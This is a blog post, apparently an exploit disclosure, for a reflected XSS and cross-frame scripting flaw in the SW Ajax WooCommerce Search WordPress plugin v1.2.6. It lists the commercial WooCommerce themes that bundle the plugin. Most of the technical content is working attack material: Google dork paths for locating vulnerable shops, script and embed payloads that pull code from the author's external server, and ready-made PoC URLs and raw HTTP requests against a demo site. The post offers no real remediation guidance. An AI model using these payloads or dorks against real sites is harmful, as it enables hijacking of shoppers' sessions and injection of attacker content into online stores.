Open in app

Sign in

Write

Sign in

[WordPress] SW Ajax WooCommerce Search plugin v1.2.6 — Unauthenticated Reflected XSS & XFS

Ex.Mi
3 min readOct 24, 2020

--

[WordPress] SW Ajax WooCommerce Search plugin v1.2.6 — Unauthenticated Reflected XSS & XFS
[+] :: Exploit Title: SW Ajax WooCommerce Search plugin v1.2.6 - Unauthenticated Reflected XSS & XFS
[+] :: Google Dork: inurl:/wp-content/plugins/sw_ajax_woocommerce_search/
[+] :: Date: 2020-10-21
[+] :: Exploit Author: Ex.Mi [ https://ex-mi.ru ]
[+] :: Vendor: MagenTech | WPThemeGo [ https://www.magentech.com | http://www.wpthemego.com ]
[+] :: Software Version: 1.2.6
[+] :: Software Link: https://wpthemego.com/document/documentation-for-sw-ajax-woocommerce-search/
[+] :: Tested on: Kali Linux
[+] :: CVE: 
[+] :: CWE: CWE-79, CWE-1021


[i] :: Info:

An Unauthenticated Reflected XSS & XFS vulnerabilities was discovered in the SW Ajax WooCommerce Search plugin v1.2.6 for WordPress.

The plugin comes with a number of commercial themes such as: OneMall, Revo, eMarket, Autusin, Market, MaxShop, ShoppyStore, Furnicom, EtroStore, HiTheme, StyleShop, TopDeal, Victo, Avesa, Soaz, Binace, Houskit, Gaion, Furniki, Rozy, SecretSho, BosMarket, Siezz, HiStore, Ecomart, iMarket, NeoMarket, 9Merry, LeVogue, Floris, Alishop, KONStore, ShopyMall, DresShop, Shop4U, FurniHome, Tech8.


[!] :: Affected Themes (from ThemeForest):

OneMall [ https://themeforest.net/item/onemall-the-multipurpose-ecommerce-marketplace-wordpress-theme/20685400 ]

Revo [ https://themeforest.net/item/revo-multipurpose-responsive-woocommerce-theme/18276186 ]

eMarket [ https://themeforest.net/item/emarket-multipurpose-woocommerce-wordpress-theme/20492674 ]

Autusin [ https://themeforest.net/item/autusin-auto-parts-equipments-woocommerce-theme/22681468 ]

Market [ https://themeforest.net/item/market-responsive-woocommerce-wordpress-theme/9514470 ]

MaxShop [ https://themeforest.net/item/maxshop-responsive-wordpress-woocommerce-theme/11452732 ]

ShoppyStore [ https://themeforest.net/item/shoppystore-woocommerce-wordpress-theme/13607293 ]

Furnicom [ https://themeforest.net/item/furnicom-responsive-furniture-woocommerce-wordpress-theme/15548234 ]

EtroStore [ https://themeforest.net/item/etrostore-multipurpose-responsive-woocommerce-wordpress-theme/19250849 ]

HiTheme [ https://themeforest.net/item/hitheme-responsive-woocommerce-wordpress-theme/19618312 ]

StyleShop [ https://themeforest.net/item/styleshop-multipurpose-responsive-woocommerce-theme/19680545 ]

TopDeal [ https://themeforest.net/item/topdeal-responsive-woocommerce-wordpress-theme/20308469 ]

Victo [ https://themeforest.net/item/victo-ecommerce-marketplace-wordpress-theme/20728619 ]

Avesa [ https://themeforest.net/item/avesa-beauty-store-woocommerce-wordpress-theme/25696718 ]

Soaz [ https://themeforest.net/item/soaz-furniture-store-wordpress-woocommerce-theme/23858298 ]

Binace [ https://themeforest.net/item/binace-fashion-shop-wordpress-woocommerce-theme/22953765 ]

Houskit [ https://themeforest.net/item/houskit-interior-design-furniture-store-wordpress-theme/23527677 ]

Gaion [ https://themeforest.net/item/gaion-sport-accessories-shop-wordpress-woocommerce-theme/23068764 ]

Furniki [ https://themeforest.net/item/furniki-furniture-store-interior-design-wordpress-theme/22846033 ]

Rozy [ https://themeforest.net/item/rozy-flower-shop-woocommerce-theme/22640923 ]

SecretSho [ https://themeforest.net/item/secretsho-fashion-marketplace-wordpress-theme/22058416 ]

BosMarket [ https://themeforest.net/item/bosmarket-flexible-multivendor-woocommerce-wordpress-theme/21207492 ]

Siezz [ https://themeforest.net/item/siezz-modern-multipurpose-marketplace-wordpress-theme/21204130 ]

HiStore [ https://themeforest.net/item/histore-clean-ecommerce-marketplace-wordpress-theme/20906824 ]


[!] :: Affected Themes (from WPThemeGo):

iMarket [ https://wpthemego.com/item/imarket-creative-gift-shop-woocommerce-wordpress-theme/ ]

NeoMarket [ https://wpthemego.com/item/neomarket-modern-multi-vendor-woocommerce-wordpress-theme/ ]

EcoMart [ https://wpthemego.com/item/ecomart-organic-food-store-woocommerce-wordpress-theme/ ]

9Merry [ https://wpthemego.com/item/9merry-christmas-gifts-woocommerce-wordpress-theme/ ]

LeVogue [ https://wpthemego.com/item/levogue-fashion-shop-woocommerce-wordpress-theme/ ]

Floris [ https://wpthemego.com/item/floris-flower-shop-woocommerce-wordpress-theme/ ]

Alishop [ https://wpthemego.com/item/alishop-responsive-woocommerce-wordpress-theme/ ]

KONStore [ https://wpthemego.com/item/konstore-bridal-shop-woocommerce-wordpress-theme/ ]

ShopyMall [ https://wpthemego.com/item/shopymall-multi-vendor-marketplace-woocommerce-wordpress-theme/ ]

DresShop [ https://wpthemego.com/item/dresshop-fashion-shop-woocommerce-wordpress-theme/ ]

Shop4U [ https://wpthemego.com/item/shop4u-modern-marketplace-woocommerce-wordpress-theme/ ]

FurniHome [ https://wpthemego.com/item/furnihome-furniture-store-woocommerce-wordpress-theme/ ]

Tech8 [ https://wpthemego.com/item/tech8-digital-store-woocommerce-wordpress-theme/ ]


[%] :: Google Dorks:

/wp-content/themes/onemall/

/wp-content/themes/revo/

/wp-content/themes/emarket/

/wp-content/themes/autusin/

/wp-content/themes/market/

/wp-content/themes/maxshop/

/wp-content/themes/shoppystore/

/wp-content/themes/furnicom/

/wp-content/themes/etrostore/

/wp-content/themes/hitheme/

/wp-content/themes/styleshop/

/wp-content/themes/topdeal/

/wp-content/themes/victo/

/wp-content/themes/avesa/

/wp-content/themes/soaz/

/wp-content/themes/binace/

/wp-content/themes/houskit/

/wp-content/themes/gaion/

/wp-content/themes/furniki/

/wp-content/themes/rozy/

/wp-content/themes/secretsho/

/wp-content/themes/bosmarket/

/wp-content/themes/siezz/

/wp-content/themes/histore/

/wp-content/themes/ecomart/

/wp-content/themes/imarket/

/wp-content/themes/neomarket/

/wp-content/themes/9merry/

/wp-content/themes/levogue/

/wp-content/themes/floris/

/wp-content/themes/alishop/

/wp-content/themes/konstore/

/wp-content/themes/shopymall/

/wp-content/themes/dresshop/

/wp-content/themes/shop4u/

/wp-content/themes/furnihome/

/wp-content/themes/tech8/


[$] :: Payloads:

"><script src="https://ex-mi.ru/payload/a2r.js"></script>

"><embed src="https://ex-mi.ru/payload/xfsii.html">


[!] :: PoC Unauthenticated Reflected XSS:

https://demo.wpthemego.com/themes/sw_onemall/layout2/?category=&s=%22%3E%3Cscript+src%3Dhttps%3A%2F%2Fex-mi.ru%2Fpayload%2Fa2r.js%3E%3C%2Fscript%3E&search_posttype=product


[!] :: PoC Unauthenticated Reflected XSS (Burp Suite):

GET /themes/sw_onemall/layout2/?category=&s=%22%3E%3Cscript+src%3Dhttps%3A%2F%2Fex-mi.ru%2Fpayload%2Fa2r.js%3E%3C%2Fscript%3E&search_posttype=product HTTP/1.1
Host: demo.wpthemego.com


[!] :: PoC Unauthenticated XFS:

https://demo.wpthemego.com/themes/sw_onemall/layout2/?category=&s=%22%3E%3Cembed+src%3Dhttps%3A%2F%2Fex-mi.ru%2Fpayload%2Fxfsii.html%3E&search_posttype=product


[!] :: PoC Unauthenticated XFS (Burp Suite):

GET /themes/sw_onemall/layout2/wp-admin/admin-ajax.php?action=sw_search_products_callback&limit=5&search_type=0&query=%22%3E%3Cembed+src%3Dhttps%3A%2F%2Fex-mi.ru%2Fpayload%2Fxfsii.html%3E HTTP/1.1
Host: demo.wpthemego.com


[@] :: Contacts:

Website: ex-mi.ru
Telegram: @ex_mi
GitHub: @ex-mi
Medium: @ex.mi

https://ex-mi.ru/exploit/[2020-10-21]-[WordPress]-sw-ajax-woocommerce-search-plugin-v1.2.6.txt

Wordpress Plugins
Wordpress Themes
Vulnerability
Application Security
Hacking

--

--

Ex.Mi
Ex.Mi

Written by Ex.Mi

4 Followers
5 Following

Dev/Sec/Gfx Freelancer from Russia. Don’t like *ethical* stuff, love pistachio ice cream.

No responses yet

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams